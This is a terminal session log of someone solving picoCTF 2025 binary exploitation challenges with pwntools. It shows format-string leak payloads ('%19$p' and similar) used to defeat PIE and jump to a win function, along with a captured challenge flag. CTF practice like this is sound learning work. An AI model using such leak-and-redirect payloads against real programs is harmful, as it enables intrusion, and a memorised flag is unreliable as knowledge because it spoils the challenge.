user@parrot(2007) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_
[2:1]$ python exploit_pie_time_2.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/vu
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[*] addr_main_offset=0x00001400, addr_win_offset=0x0000136A
[+] Starting local process '/usr/bin/gdbserver' argv=[b'/usr/bin/gdbserver', b'--mu
[DEBUG] Received 0x3d bytes:
    b'Process ./vuln created; pid = 390499\n'
    b'Listening on port 34113\n'
[DEBUG] Wrote gdb script to '/tmp/pwnlib-gdbscript-oq8uga4p.gdb'
    target remote 127.0.0.1:34113
[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwnlib-gd
[DEBUG] Created script for new terminal:
    #!/home/user/20240819/bin/python
    import os
    os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwnlib-g
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'splitw', '-h', '-F#{pane_pid}'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWar
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x38 bytes:
    b'Remote debugging from host ::ffff:127.0.0.1, port 55066\n'
Traceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    proc.sendlineafter( 'name:', b'%23$p' )
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", lin
    res = self.recvuntil(delim, timeout=timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", lin
    res = self.recv(timeout=self.timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", lin
    return self._recv(numb, timeout) or b''
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", lin
    if not self.buffer and not self._fillbuffer(timeout):
                               ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", lin
    data = self.recv_raw(self.buffer.get_fill_size())
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/process.py",
    raise EOFError
EOFError
[*] Process '/usr/bin/gdbserver' stopped with exit code 0 (pid 390499)
(20240819)
user@parrot(2007) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_
[2:1]$
[17] 0:bash*







































































        ../../python/investment_simulation.csv
        ../../python/pwnable_template.py
        ../../python/sbof_pivot
        ../../rust/

(20240819)
user@parrot(2010) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ rm login1_patch_nop.bak
(20240819)
user@parrot(2011) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ git commit -am "kaidai_2"
[main d10c6e0] kaidai_2
 8 files changed, 140 insertions(+), 2 deletions(-)
 create mode 100755 kaidai_pwnable/chapter2/exploit_login1.py
 create mode 100644 kaidai_pwnable/chapter2/flag.txt
 create mode 100755 kaidai_pwnable/chapter2/login1
 create mode 100644 kaidai_pwnable/chapter2/login1.c
 create mode 100755 kaidai_pwnable/chapter2/login1_patch
 create mode 100755 kaidai_pwnable/chapter2/login1_patch_nop
(20240819)
user@parrot(2012) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ git push
Enumerating objects: 27, done.
Counting objects: 100% (27/27), done.
Delta compression using up to 2 threads
Compressing objects: 100% (15/15), done.
Writing objects: 100% (18/18), 6.26 KiB | 213.00 KiB/s, done.
Total 18 (delta 8), reused 0 (delta 0), pack-reused 0
remote: Resolving deltas: 100% (8/8), completed with 4 local objects.
To github.com:dk0893/experiment.git
   b143933..d10c6e0  main -> main
(20240819)
user@parrot(2013) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ ll
合計 84K
drwxr-xr-x 1 user user 158  5月 13 16:18 ./
drwxr-xr-x 1 user user  16  5月 12 22:19 ../
-rw------- 1 user user  19  5月 12 22:48 .gdb_history
-rwxr--r-- 1 user user 686  5月 13 16:49 exploit_login1.py*
-rw-r--r-- 1 user user   9  5月 12 22:34 flag.txt
-rwxr-xr-x 1 user user 17K  5月 12 22:19 login1*
-rw-r--r-- 1 user user 949  5月 12 22:19 login1.c
-rwxr-xr-x 1 user user 21K  5月 12 22:27 login1_patch*
-rwxr-xr-x 1 user user 21K  5月 13 16:01 login1_patch_nop*
(20240819)
user@parrot(2014) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ tmux
[detached (from session 17)]
(20240819)
user@parrot(2015) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ cd ../../picoCTF/
picoCTF2023_BinaryExploitation/ picoCTF2024_ReverseEngineering/
picoCTF2023_GeneralSkills/      picoCTF2024_WebExploitation/
picoCTF2023_ReverseEngineering/ picoCTF2025_BinaryExploitation/
picoCTF2024_BinaryExploitation/ picoCTF2025_GeneralSkills/
picoCTF2024_Cryptography/       picoCTF2025_ReverseEngineering/
picoCTF2024_Forensics/          picoMini2022/
(20240819)
user@parrot(2015) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ cd ../../picoCTF/picoc
picoCTF2023_BinaryExploitation/ picoCTF2024_ReverseEngineering/
picoCTF2023_GeneralSkills/      picoCTF2024_WebExploitation/
picoCTF2023_ReverseEngineering/ picoCTF2025_BinaryExploitation/
picoCTF2024_BinaryExploitation/ picoCTF2025_GeneralSkills/
picoCTF2024_Cryptography/       picoCTF2025_ReverseEngineering/
picoCTF2024_Forensics/
(20240819)
user@parrot(2015) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ cd ../../picoCTF/picoCTF2025
picoCTF2025_BinaryExploitation/ picoCTF2025_ReverseEngineering/
picoCTF2025_GeneralSkills/
(20240819)
user@parrot(2015) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ cd ../../picoCTF/picoCTF2025_BinaryExploitation/
PIE_TIME/   PIE_TIME_2/
(20240819)
user@parrot(2015) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ cd ../../picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/
(20240819)
user@parrot(2016) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_                                                                            2
[1:0]$ ll
合計 36K
drwxr-xr-x 1 user user  102  5月 13 17:28 ./
drwxr-xr-x 1 user user  342  3月 18 21:34 ../
-rw------- 1 user user  183  3月 16 18:54 .gdb_history
-rwxr--r-- 1 user user 2.4K  5月 13 17:28 exploit_pie_time_2.py*
-rwxr--r-- 1 user user   17  3月  9 20:37 flag.txt*
-rwxr--r-- 1 user user  17K  3月 15 22:32 vuln*
-rwxr--r-- 1 user user  939  3月 15 22:32 vuln.c*
(20240819)
user@parrot(2017) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_                                                                            2
[1:0]$ git st
On branch main
Your branch is up to date with 'origin/main'.

Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        modified:   ../../../kaidai_pwnable/chapter2/exploit_login1.py

Untracked files:
  (use "git add <file>..." to include in what will be committed)
        ../../../book_Binary/
        ../../../c/input1.c
        ../../../c/input2.c
        ../../../python/core
        ../../../python/exploit_sbof_pivot.bin
        ../../../python/exploit_sbof_pivot.py
        ../../../python/exploit_sbof_pivot_draft.py
        ../../../python/finance.py
        ../../../python/investment_simulation.csv
        ../../../python/pwnable_template.py
        ../../../python/sbof_pivot
        ../../../rust/

no changes added to commit (use "git add" and/or "git commit -a")
(20240819)
user@parrot(2018) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_                                                                            2
[1:0]$ git ls-files
(20240819)
user@parrot(2019) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_                                                                            2
[1:0]$ cd ..
(20240819)
user@parrot(2020) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation
[1:0]$ git ls-files
(20240819)
user@parrot(2021) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation
[1:0]$ gitst
-bash: gitst: コマンドが見つかりません
(20240819)
user@parrot(2022) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation
[1:127]$ git st
On branch main
Your branch is up to date with 'origin/main'.

Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        modified:   ../../kaidai_pwnable/chapter2/exploit_login1.py

Untracked files:
  (use "git add <file>..." to include in what will be committed)
        ../../book_Binary/
        ../../c/input1.c
        ../../c/input2.c
        ../../python/core
        ../../python/exploit_sbof_pivot.bin
        ../../python/exploit_sbof_pivot.py
        ../../python/exploit_sbof_pivot_draft.py
        ../../python/finance.py
        ../../python/investment_simulation.csv
        ../../python/pwnable_template.py
        ../../python/sbof_pivot
        ../../rust/

no changes added to commit (use "git add" and/or "git commit -a")
(20240819)
user@parrot(2023) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation
[1:0]$ git ls-files
(20240819)
user@parrot(2024) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation
[1:0]$ cd ..
(20240819)
user@parrot(2025) ~/svn/experiment/picoCTF
[1:0]$ git ls-files
picoCTF2024_BinaryExploitation/format-string-3/format-string-3
picoCTF2024_BinaryExploitation/format-string-3/format-string-3-jp.png
picoCTF2024_BinaryExploitation/format-string-3/format-string-3.c
picoCTF2024_BinaryExploitation/format-string-3/format-string-3.png
picoCTF2024_BinaryExploitation/format-string-3/ld-linux-x86-64.so.2
picoCTF2024_BinaryExploitation/format-string-3/libc.so.6
picoCTF2024_BinaryExploitation/format-string-3/readme.txt
picoCTF2024_BinaryExploitation/format-string-3/tmp.py
picoCTF2024_ReverseEngineering/Classic Crackme 0x100/Classic Crackme 0x100 jp.png
picoCTF2024_ReverseEngineering/Classic Crackme 0x100/Classic Crackme 0x100.png
picoCTF2024_ReverseEngineering/Classic Crackme 0x100/crackme100
picoCTF2024_ReverseEngineering/Classic Crackme 0x100/crackme100.py
picoCTF2024_ReverseEngineering/Classic Crackme 0x100/readme.txt
picoCTF2025.png
picoCTF2025_ReverseEngineering/Chronohack/Chronohack.png
picoCTF2025_ReverseEngineering/Chronohack/Chronohack_jp.png
picoCTF2025_ReverseEngineering/Chronohack/flag.txt
picoCTF2025_ReverseEngineering/Chronohack/readme.txt
picoCTF2025_ReverseEngineering/Chronohack/token_generator.py
picoCTF2025_ReverseEngineering/Chronohack/token_generator_pwntools.py
picoCTF2025_ReverseEngineering/Quantum_Scrambler/Quantum_Scrambler.png
picoCTF2025_ReverseEngineering/Quantum_Scrambler/Quantum_Scrambler_jp.png
picoCTF2025_ReverseEngineering/Quantum_Scrambler/flag.txt
picoCTF2025_ReverseEngineering/Quantum_Scrambler/quantum_scrambler.py
picoCTF2025_ReverseEngineering/Quantum_Scrambler/quantum_scrambler_decrypt.py
picoCTF2025_ReverseEngineering/Quantum_Scrambler/quantum_scrambler_pre.py
picoCTF2025_ReverseEngineering/Quantum_Scrambler/readme.txt
picoCTF2025_ReverseEngineering/Tap_into_Hash/Tap_into_Hash.png
picoCTF2025_ReverseEngineering/Tap_into_Hash/Tap_into_Hash_jp.png
picoCTF2025_ReverseEngineering/Tap_into_Hash/block_chain.py
picoCTF2025_ReverseEngineering/Tap_into_Hash/block_chain_decode.py
picoCTF2025_ReverseEngineering/Tap_into_Hash/enc_flag
picoCTF2025_ReverseEngineering/Tap_into_Hash/readme.txt
picoCTF2025_ReverseEngineering/perplexed_/perplexed
picoCTF2025_ReverseEngineering/perplexed_/perplexed.S
picoCTF2025_ReverseEngineering/perplexed_/perplexed.png
picoCTF2025_ReverseEngineering/perplexed_/perplexed.py
picoCTF2025_ReverseEngineering/perplexed_/perplexed_jp.png
picoCTF2025_ReverseEngineering/perplexed_/readme.txt
picoCTF2025_ReverseEngineering/perplexed_/stack.png
picoMini2022/PW Crack 4/level4.flag.txt.enc
picoMini2022/PW Crack 4/level4.hash.bin
picoMini2022/PW Crack 4/level4.py
picoMini2022/PW Crack 4/readme.txt
picoMini2022/PW Crack 4/tmp.py
picoMini2022/PW Crack 5/dictionary.txt
picoMini2022/PW Crack 5/level5.flag.txt.enc
picoMini2022/PW Crack 5/level5.hash.bin
picoMini2022/PW Crack 5/level5.py
picoMini2022/PW Crack 5/readme.txt
picoMini2022/PW Crack 5/tmp.py
(20240819)
user@parrot(2026) ~/svn/experiment/picoCTF
[1:0]$ cd -
/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation
(20240819)
user@parrot(2027) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation
[1:0]$ cd
PIE_TIME/   PIE_TIME_2/
(20240819)
user@parrot(2027) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation
[1:0]$ cd PIE_TIME_2/
(20240819)
user@parrot(2028) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_                                                                            2
[1:0]$ ll
合計 36K
drwxr-xr-x 1 user user  102  5月 13 17:28 ./
drwxr-xr-x 1 user user  342  3月 18 21:34 ../
-rw------- 1 user user  183  3月 16 18:54 .gdb_history
-rwxr--r-- 1 user user 2.4K  5月 13 17:28 exploit_pie_time_2.py*
-rwxr--r-- 1 user user   17  3月  9 20:37 flag.txt*
-rwxr--r-- 1 user user  17K  3月 15 22:32 vuln*
-rwxr--r-- 1 user user  939  3月 15 22:32 vuln.c*
(20240819)
user@parrot(2029) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_                                                                            2
[1:0]$ ll
合計 36K
drwxr-xr-x 1 user user  102  5月 13 17:28 ./
drwxr-xr-x 1 user user  342  3月 18 21:34 ../
-rw------- 1 user user  183  3月 16 18:54 .gdb_history
-rwxr--r-- 1 user user 2.4K  5月 13 17:41 exploit_pie_time_2.py*
-rwxr--r-- 1 user user   17  3月  9 20:37 flag.txt*
-rwxr--r-- 1 user user  17K  3月 15 22:32 vuln*
-rwxr--r-- 1 user user  939  3月 15 22:32 vuln.c*
(20240819)
user@parrot(2029) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_                                                                            2
[1:0]$ pytho
python
python-argcomplete-check-easy-install-script
python-argcomplete-tcsh
python-dotenv
python3
python3-config
python3-futurize
python3-pasteurize
python3-qr
python3-tor-prompt
python3.11
python3.11-config
(20240819)
user@parrot(2029) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_                                                                            2
[1:0]$ python exploit_pie_time_2.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/vu                                                                            ln'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[*] addr_main_offset=0x00001400, addr_win_offset=0x0000136A
[q] Opening connection to rescued-float.picoctf.net on port 49884: Trying 3.20.79.1                                                                            [+] Opening connection to rescued-float.picoctf.net on port 49884: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWar                                                                            ning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.c                                                                            om/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x10 bytes:
    b'Enter your name:'
[DEBUG] Sent 0x24 bytes:
    b'%19$p,%20$p,%21$p,%22$p,%23$p,%24$p\n'
[DEBUG] Received 0x7c bytes:
    b'0x57d2085b7441,(nil),0x7c85d937d083,0x7c85d957d620,0x7ffe6cd21d18,0x100000000                                                                            \n'
    b' enter the address to jump to, ex => 0x12345: '
[*] type(addr)=<class 'str'>, addr=0x57d2085b7441,(nil),0x7c85d937d083,0x7c85d957d6                                                                            20,0x7ffe6cd21d18,0x100000000
Traceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2                                                                            /exploit_pie_time_2.py", line 85, in <module>
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2                                                                            /exploit_pie_time_2.py", line 81, in main
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2                                                                            /exploit_pie_time_2.py", line 52, in attack
    addr_main = int( addr, 16 )
                ^^^^^^^^^^^^^^^
ValueError: invalid literal for int() with base 16: '0x57d2085b7441,(nil),0x7c85d93                                                                            7d083,0x7c85d957d620,0x7ffe6cd21d18,0x100000000\n'
[*] Closed connection to rescued-float.picoctf.net port 49884
(20240819)
user@parrot(2030) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_                                                                            2
[1:1]$ python exploit_pie_time_2.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/vuln'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[*] addr_main_offset=0x00001400, addr_win_offset=0x0000136A
[+] Opening connection to rescued-float.picoctf.net on port 49884: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x10 bytes:
    b'Enter your name:'
[DEBUG] Sent 0x24 bytes:
    b'%19$p,%20$p,%21$p,%22$p,%23$p,%24$p\n'
[DEBUG] Received 0x7c bytes:
    b'0x631285f77441,(nil),0x71b6d9b28083,0x71b6d9d28620,0x7ffca91d3988,0x100000000\n'
    b' enter the address to jump to, ex => 0x12345: '
[*] type(addr)=<class 'str'>, addr=0x631285f77441,(nil),0x71b6d9b28083,0x71b6d9d28620,0x7ffca91d3988,0x100000000
Traceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/exploit_pie_time_2.py", line 85, in <module>
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/exploit_pie_time_2.py", line 81, in main
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/exploit_pie_time_2.py", line 52, in attack
    addr_main = int( addr, 16 )
                ^^^^^^^^^^^^^^^
ValueError: invalid literal for int() with base 16: '0x631285f77441,(nil),0x71b6d9b28083,0x71b6d9d28620,0x7ffca91d3988,0x100000000\n'
[*] Closed connection to rescued-float.picoctf.net port 49884
(20240819)
user@parrot(2030) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:1]$ python exploit_pie_time_2.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/vuln'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[*] addr_main_offset=0x00001400, addr_win_offset=0x0000136A
[+] Opening connection to rescued-float.picoctf.net on port 49884: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x10 bytes:
    b'Enter your name:'
[DEBUG] Sent 0x6 bytes:
    b'%19$p\n'
[DEBUG] Received 0x3d bytes:
    b'0x581ab79a1441\n'
    b' enter the address to jump to, ex => 0x12345: '
[*] type(addr)=<class 'str'>, addr=0x581ab79a1441
[*] addr_main=0x581AB79A1400, addr_win=0x581AB79A136A
[DEBUG] Sent 0xf bytes:
    b'0x581ab79a136a\n'
[DEBUG] Received 0x9 bytes:
    b'You won!\n'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] You won!
[DEBUG] Received 0x26 bytes:
    b"picoCTF{p13_5h0u1dn'7_134k_2509623b}\n"
    b'\n'
[*] picoCTF{p13_5h0u1dn'7_134k_2509623b}
[*]
Traceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/exploit_pie_time_2.py", line 86, in <module>
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/exploit_pie_time_2.py", line 82, in main
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/exploit_pie_time_2.py", line 69, in attack
    info( proc.recvline() )
          ^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 498, in recvline
    return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 341, in recvuntil
    res = self.recv(timeout=self.timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 106, in recv
    return self._recv(numb, timeout) or b''
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 176, in _recv
    if not self.buffer and not self._fillbuffer(timeout):
                               ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 155, in _fillbuffer
    data = self.recv_raw(self.buffer.get_fill_size())
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/sock.py", line 56, in recv_raw
    raise EOFError
EOFError
[*] Closed connection to rescued-float.picoctf.net port 49884
(20240819)
user@parrot(2030) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:1]$ ll
合計 36K
drwxr-xr-x 1 user user  102  5月 13 17:28 ./
drwxr-xr-x 1 user user  342  3月 18 21:34 ../
-rw------- 1 user user  183  3月 16 18:54 .gdb_history
-rwxr--r-- 1 user user 2.5K  5月 13 17:49 exploit_pie_time_2.py*
-rwxr--r-- 1 user user   17  3月  9 20:37 flag.txt*
-rwxr--r-- 1 user user  17K  3月 15 22:32 vuln*
-rwxr--r-- 1 user user  939  3月 15 22:32 vuln.c*
(20240819)
user@parrot(2031) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:0]$
(20240819)
user@parrot(2031) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:0]$ git add
.gdb_history           PIE_TIME_2_jp.png      flag.txt               vuln
PIE_TIME_2.png         exploit_pie_time_2.py  readme.txt             vuln.c
(20240819)
user@parrot(2031) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:0]$ git add PIE_TIME_2_jp.png PIE_TIME_2.png exploit_pie_time_2.py readme.txt flag.txt  vuln.c
The following paths are ignored by one of your .gitignore files:
picoCTF
hint: Use -f if you really want to add them.
hint: Turn this message off by running
hint: "git config advice.addIgnoredFile false"
(20240819)
user@parrot(2032) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:1]$ git add -f PIE_TIME_2_jp.png PIE_TIME_2.png exploit_pie_time_2.py readme.txt flag.txt  vuln.c
(20240819)
user@parrot(2033) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:0]$ git st
On branch main
Your branch is up to date with 'origin/main'.

Changes to be committed:
  (use "git restore --staged <file>..." to unstage)
        new file:   PIE_TIME_2.png
        new file:   PIE_TIME_2_jp.png
        new file:   exploit_pie_time_2.py
        new file:   flag.txt
        new file:   readme.txt
        new file:   vuln.c

Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        modified:   ../../../kaidai_pwnable/chapter2/exploit_login1.py

Untracked files:
  (use "git add <file>..." to include in what will be committed)
        ../../../book_Binary/
        ../../../c/input1.c
        ../../../c/input2.c
        ../../../python/core
        ../../../python/exploit_sbof_pivot.bin
        ../../../python/exploit_sbof_pivot.py
        ../../../python/exploit_sbof_pivot_draft.py
        ../../../python/finance.py
        ../../../python/investment_simulation.csv
        ../../../python/pwnable_template.py
        ../../../python/sbof_pivot
        ../../../rust/

(20240819)
user@parrot(2034) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:0]$ git commit -am "picoCTF2025_BinaryExploitation/PIE_TIME_2"
[main e04e532] picoCTF2025_BinaryExploitation/PIE_TIME_2
 7 files changed, 641 insertions(+), 3 deletions(-)
 create mode 100755 picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/PIE_TIME_2.png
 create mode 100755 picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/PIE_TIME_2_jp.png
 create mode 100755 picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/exploit_pie_time_2.py
 create mode 100755 picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/flag.txt
 create mode 100755 picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/readme.txt
 create mode 100755 picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/vuln.c
(20240819)
user@parrot(2035) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:0]$ git push
Enumerating objects: 19, done.
Counting objects: 100% (19/19), done.
Delta compression using up to 2 threads
Compressing objects: 100% (11/11), done.
Writing objects: 100% (14/14), 131.61 KiB | 837.00 KiB/s, done.
Total 14 (delta 5), reused 0 (delta 0), pack-reused 0
remote: Resolving deltas: 100% (5/5), completed with 4 local objects.
To github.com:dk0893/experiment.git
   d10c6e0..e04e532  main -> main
(20240819)
user@parrot(2036) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:0]$ ll /home/
user/   valley/
(20240819)
user@parrot(2036) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:0]$ ll /home/valley/
合計 4.0K
drwxr-xr-x 1 root root 16  3月 17 22:50 ./
drwxr-xr-x 1 root root 20  3月 17 22:50 ../
-rwxr--r-- 1 root root 17  3月 17 22:50 flag.txt*
(20240819)
user@parrot(2037) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
[1:0]$ cd ../EchoValley/
(20240819)
user@parrot(2038) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ ll
合計 32K
drwxr-xr-x 1 user user   78  5月 13 18:21 ./
drwxr-xr-x 1 user user  300  5月 13 18:21 ../
-rwxr--r-- 1 user user 2.4K  5月 13 18:28 exploit_valley.py*
-rwxr--r-- 1 user user   17  3月  9 20:37 flag.txt*
-rwxr--r-- 1 user user  20K  3月 16 18:50 valley*
-rwxr--r-- 1 user user  955  3月 16 18:50 valley.c*
(20240819)
user@parrot(2039) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ pytho
python                                        python3                                       python3-qr
python-argcomplete-check-easy-install-script  python3-config                                python3-tor-prompt
python-argcomplete-tcsh                       python3-futurize                              python3.11
python-dotenv                                 python3-pasteurize                            python3.11-config
(20240819)
user@parrot(2039) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley
[1:0]$ python exploit_valley.py
[*] '/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/valley'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[*] addr_main_offset=0x00001401, addr_flag_offset=0x00001269
[+] Opening connection to shape-facility.picoctf.net on port 56668: Done
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x2b bytes:
    b'Welcome to the Echo Valley, Try Shouting: \n'


^CTraceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 76, in <module>
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/EchoValley/exploit_valley.py", line 72, in main
    attack( proc )
